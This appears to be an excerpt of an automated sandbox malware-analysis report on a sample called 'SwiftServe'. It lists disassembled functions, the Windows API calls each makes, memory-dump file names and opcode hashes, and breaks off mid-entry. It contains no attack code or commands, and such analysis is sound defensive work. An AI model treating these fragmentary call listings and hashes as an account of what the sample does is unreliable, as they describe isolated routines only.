Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E35ABB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 271caf0cddd3448597c0a817157c58d2da7297b01355a7716cb3bfada54f4701
Instruction ID: 182399aefe27f748ccfe76294eb4a899dfbcf9a6e090b4b0ff6a0afc685ac64b
Opcode Fuzzy Hash: 271caf0cddd3448597c0a817157c58d2da7297b01355a7716cb3bfada54f4701
Instruction Fuzzy Hash: 0D318EB15057058FD720DF25D8886A7BBE8FB48308F001A2EF6DAA6350E771A948DB52

Function 00E4593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00E45953

Part of subcall function 00E4A39B: __NMSG_WRITE.LIBCMT ref: 00E4A3C2
Part of subcall function 00E4A39B: __NMSG_WRITE.LIBCMT ref: 00E4A3CC

__NMSG_WRITE.LIBCMT ref: 00E4595A

Part of subcall function 00E4A3F8: GetModuleFileNameW.KERNEL32(00000000,00EE53BA,00000104,?,00000001,00E41003), ref: 00E4A48A
Part of subcall function 00E4A3F8: ___crtMessageBoxW.LIBCMT ref: 00E4A538

Part of subcall function 00E432CF: ___crtCorExitProcess.LIBCMT ref: 00E432D5
Part of subcall function 00E432CF: ExitProcess.KERNEL32 ref: 00E432DE

Part of subcall function 00E48D58: __getptd_noexit.LIBCMT ref: 00E48D58

RtlAllocateHeap.NTDLL(01830000,00000000,00000001,?,?,?,?,00E41003,?,0000FFFF), ref: 00E4597F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: f6356a98dbfbf57c0b6f83219aff1f14522dfb1d184441ba7df36111cd1c72d9
Instruction ID: e4b54252f1a008e96210b5614749493dd19465a087f773103eb893d40d20caca
Opcode Fuzzy Hash: f6356a98dbfbf57c0b6f83219aff1f14522dfb1d184441ba7df36111cd1c72d9
Instruction Fuzzy Hash: 3F01DE33242B46EBE6113B35BC42A6E329C9F92778F10253AF625BA1A2DE708D004661

Function 00E892C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E892D6

Part of subcall function 00E42F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00E49C54,00000000,00E48D5D,00E459C3,?), ref: 00E42F99
Part of subcall function 00E42F85: GetLastError.KERNEL32(00000000,?,00E49C54,00000000,00E48D5D,00E459C3,?), ref: 00E42FAB

_free.LIBCMT ref: 00E892E7
_free.LIBCMT ref: 00E892F9

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction ID: e8d99ad4026896a12f13e5a015429a5b31033f4138be5c38ba8ce2d5108dceb9
Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
Instruction Fuzzy Hash: 68E0C2A1F0460253CA20B5387C40EA377EC0F88391798250DB50DF3143CF20F8408228

Function 00E87221 Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00000002,?,?,00E86F4D,00000000), ref: 00E87237
GetCurrentProcess.KERNEL32(?,00000000,?,00E86F4D,00000000), ref: 00E8723F
DuplicateHandle.KERNELBASE(00000000,?,00E86F4D,00000000), ref: 00E87246

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: c71234cf9fb1ab8fcbb34552024c62178ac8a7be210b5ce24768b9f96332aefa
Instruction ID: 645f42e387146717ffcc3dc180424fd37425bfa9b544c4bb054e5770ca66def3
Opcode Fuzzy Hash: c71234cf9fb1ab8fcbb34552024c62178ac8a7be210b5ce24768b9f96332aefa
Instruction Fuzzy Hash: 73D017B6145205BFC7012BAAEC0DF6B7B2CDBD5B62F204019F609A5262AA70A4485764

Function 00E87079 Relevance: 4.5, APIs: 3, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E877EB: InterlockedExchange.KERNEL32(?,?), ref: 00E877FE
Part of subcall function 00E877EB: EnterCriticalSection.KERNEL32(?,?,00E2C2B6,?,?), ref: 00E8780F
Part of subcall function 00E877EB: TerminateThread.KERNEL32(00000000,000001F6,?,00E2C2B6,?,?), ref: 00E8781C
Part of subcall function 00E877EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00E2C2B6,?,?), ref: 00E87829
Part of subcall function 00E877EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 00E8783C
Part of subcall function 00E877EB: LeaveCriticalSection.KERNEL32(?,?,00E2C2B6,?,?), ref: 00E87843

FindCloseChangeNotification.KERNELBASE(?,?,00E870DF), ref: 00E8708A
CloseHandle.KERNEL32(?,?,00E870DF), ref: 00E87093
DeleteCriticalSection.KERNEL32(?,?,00E870DF), ref: 00E870A6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
String ID:
API String ID: 744473657-0
Opcode ID: 7b473eb669d875e634289122325a57c014f0fa559d6e955edb49de3787b7fc88
Instruction ID: 48b7fb82b88e3067299f291cd415e1be26d4c92bd97f3d318ab210e8f862b40a
Opcode Fuzzy Hash: 7b473eb669d875e634289122325a57c014f0fa559d6e955edb49de3787b7fc88
Instruction Fuzzy Hash: A5E0EC32000602AFC7412FA5FD0984BBFF9BF847113245216F109A1930CB71A4B5CB50

Function 00E25E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 00E5E234

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: c9a7a15eeaeb0268fc93f2a57aa571d158b40cc9444f1e94ecbae60ff68208a7
Instruction ID: 16baa7ba8a7bc7fce6bb36fabf04a126bfbfcbe43bdfa1d54098c265fcf220c3
Opcode Fuzzy Hash: c9a7a15eeaeb0268fc93f2a57aa571d158b40cc9444f1e94ecbae60ff68208a7
Instruction Fuzzy Hash: 19327C70508351DFDB28DF14D584A6AB7E1BF84304F15AA6DF88AAB362C731ED45CB82

Function 00E40E38 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00E40ED5
CreateToolhelp32Snapshot.KERNEL32 ref: 00E40EE7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationSnapshotToolhelp32
String ID:
API String ID: 4162189087-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: a601942d766600bceebcea84cd82c3cc22b3102655bc0fdc61240c335f07cc02
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 4A31E671A00109DFCB18DF58E480969F7A6FF89304B649AA5E509EF252E731EDD1CBC0

Function 00E35F8B Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00E35FEF

Part of subcall function 00E4359C: __lock.LIBCMT ref: 00E435A2
Part of subcall function 00E4359C: DecodePointer.KERNEL32(00000001,?,00E36004,00E78892), ref: 00E435AE
Part of subcall function 00E4359C: EncodePointer.KERNEL32(?,?,00E36004,00E78892), ref: 00E435B9

Part of subcall function 00E35F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E35F18
Part of subcall function 00E35F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E35F2D

Part of subcall function 00E35240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E3526C
Part of subcall function 00E35240: IsDebuggerPresent.KERNEL32 ref: 00E3527E
Part of subcall function 00E35240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E352E6
Part of subcall function 00E35240: SetCurrentDirectoryW.KERNEL32(?), ref: 00E35366

SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00E3602F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 53dfedd933ef041e147a2fff2453bdbaba78737deeb1a049cc7e09960ce56fb0
Instruction ID: 015293243fc39f58f651c2aff01b790fbec6414e16a3b301cd914be44b08a8e9
Opcode Fuzzy Hash: 53dfedd933ef041e147a2fff2453bdbaba78737deeb1a049cc7e09960ce56fb0
Instruction Fuzzy Hash: C4118EB19083559FC310EF6AED4990ABFE8EF98310F00451AF594AB2B1DB709548CF92

Function 00E4581D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E4584C
__lock_file.LIBCMT ref: 00E4586D

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 0ab3bad8026bb79084c06ebcb9b3ca127f04aa7eea8f9cb942c8e29efce110c6
Instruction ID: 69238f827259aef241931ec86657e1ed20824b714af52a9e7dfb3c9f2d09c4cf
Opcode Fuzzy Hash: 0ab3bad8026bb79084c06ebcb9b3ca127f04aa7eea8f9cb942c8e29efce110c6
Instruction Fuzzy Hash: 90014472C00749EBCF11AF65BD0199E7BA1AF94360F149226B8247A1A2DB318A51DF91

Function 00E455C6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E48D58: __getptd_noexit.LIBCMT ref: 00E48D58

__lock_file.LIBCMT ref: 00E4560B

Part of subcall function 00E46E3E: __lock.LIBCMT ref: 00E46E61

__fclose_nolock.LIBCMT ref: 00E45616

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: c4c7289d4bf832bb2fe968b8326d36cef4ad8ccc9694d8212300d3062e73e25f
Instruction ID: 36f9305255e21de9ce0725587281c908fe1e9c5bee12bf269a7e3e6bd164d991
Opcode Fuzzy Hash: c4c7289d4bf832bb2fe968b8326d36cef4ad8ccc9694d8212300d3062e73e25f
Instruction Fuzzy Hash: 5EF09073902B059BD720AF65A90276E67E16F41375F21A249A424BB1C2CB7C4A41DB51

Function 00E86FDA Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 00E86FFF
InterlockedExchange.KERNEL32(?,00000000), ref: 00E87021

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 0b697e6e7f2de5835cde5717c1e2d0d455cd008f3f4b0025ddb1b49f4a67e8ee
Instruction ID: eab19808e5507a032bffe1f3e2892577130c0ee5d52955ca7456954cf1a4a99e
Opcode Fuzzy Hash: 0b697e6e7f2de5835cde5717c1e2d0d455cd008f3f4b0025ddb1b49f4a67e8ee
Instruction Fuzzy Hash: 99F0D4B11007059FC320DF56E948DA7FBECEF85710B40892EE58A97A20D7B4B445CB61

Function 00E45E80 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00E45EB4
__ftell_nolock.LIBCMT ref: 00E45EBF

Part of subcall function 00E48D58: __getptd_noexit.LIBCMT ref: 00E48D58

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __ftell_nolock__getptd_noexit__lock_file
String ID:
API String ID: 2999321469-0
Opcode ID: ede3e27c015cbb9bc64b3f32b9fcfaf836d8464a54f18a78b6d017aff4dd14a6
Instruction ID: 4a7484a21a1e4aa3c7ec5ca0be8bc9f7242d143721196e59b9f852c579d8e8c8
Opcode Fuzzy Hash: ede3e27c015cbb9bc64b3f32b9fcfaf836d8464a54f18a78b6d017aff4dd14a6
Instruction Fuzzy Hash: 77F0EC339116159BD710BB74A90375E72D06F11331F216306B020BB1D3CF784F429B51

Function 00E35AC3 Relevance: 3.0, APIs: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E35AEF
Shell_NotifyIconW.SHELL32(00000002,?), ref: 00E35B1F

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 448b5a068a909e476c038120dda8d9acd7273d32470e5a5d18b6461bc0c5c1c8
Instruction ID: 296cd12e27a53ff27fa2696b6c0b504f6dab788f9c788144ff919398adf7bdbb
Opcode Fuzzy Hash: 448b5a068a909e476c038120dda8d9acd7273d32470e5a5d18b6461bc0c5c1c8
Instruction Fuzzy Hash: 42F0A7B180835C9FE7928B64DC897967BBC970430CF0002E9BB88AA292D7711B8CCF51

Function 00E432CF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 00E432D5

Part of subcall function 00E4329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,00E432DA,00E41003,?,00E49EEE,000000FF,0000001E,00EDCE28,00000008,00E49E52,00E41003,00E41003), ref: 00E432AA
Part of subcall function 00E4329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00E432BC

ExitProcess.KERNEL32 ref: 00E432DE

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 7bb3076e7d2c5a63096ad2aa5af6c4d341a97c30382c771c38678be7387b605a
Instruction ID: d2e879ff0ccf5c062d655043ba45703e41abb5c28db3a59f5e65deeb3d4315f6
Opcode Fuzzy Hash: 7bb3076e7d2c5a63096ad2aa5af6c4d341a97c30382c771c38678be7387b605a
Instruction Fuzzy Hash: 10B09230004208BFCB012F62EC0E84A3FAAFF00A90B004120F80418031DBB2AA929A84

Function 00E9C355 Relevance: 1.8, APIs: 1, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LoadString$__swprintf
String ID:
API String ID: 207118244-0
Opcode ID: 2a53329b51624fed237556e0155dddb62e4964da60b56db1ba2cf290840afe8a
Instruction ID: 4a1c81275b88d38b2fbf92f8b829ca66c85c7ad6a743c4a8662759d4c8366910
Opcode Fuzzy Hash: 2a53329b51624fed237556e0155dddb62e4964da60b56db1ba2cf290840afe8a
Instruction Fuzzy Hash: B7B13A75A00109EFCF14EFA4D851DEEBBB5FF48714F20A15AE915BB291EB30A941CB90

Function 00E3343F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E3351A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: d4442165bf3bba246ed11441cc1258bea853b0a77ea4b6bc20e216edc1cd64ce
Instruction ID: 9bcec79898b1d63aabb1197882758bad409b7a9a20818fdf082bb93685244145
Opcode Fuzzy Hash: d4442165bf3bba246ed11441cc1258bea853b0a77ea4b6bc20e216edc1cd64ce
Instruction Fuzzy Hash: 0031A075604602EFC724DF28D494E61FBE0FF08320B14D569E99AAB751D730E981CB90

Function 00E5E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E5E2EA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 884928e22a4b9304b013945d332f0e93d6f6b24f30a3adc82dbefb8e24de4882
Instruction ID: b60c12d51cd54ca099f027c8c7d02dcd0ce945e7e242f1ee587822a7edb91bc7
Opcode Fuzzy Hash: 884928e22a4b9304b013945d332f0e93d6f6b24f30a3adc82dbefb8e24de4882
Instruction Fuzzy Hash: 34411974508351DFDB24DF14D484B1ABBE1BF45308F0999ACE889AB362C371EC89CB52

Function 00E349C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E34B29: FreeLibrary.KERNEL32(00000000,?), ref: 00E34B63

Part of subcall function 00E4547B: __wfsopen.LIBCMT ref: 00E45486

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00E327AF,?,00000001), ref: 00E349F4

Part of subcall function 00E34ADE: FreeLibrary.KERNEL32(00000000), ref: 00E34B18

Part of subcall function 00E348B0: _memmove.LIBCMT ref: 00E348FA

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
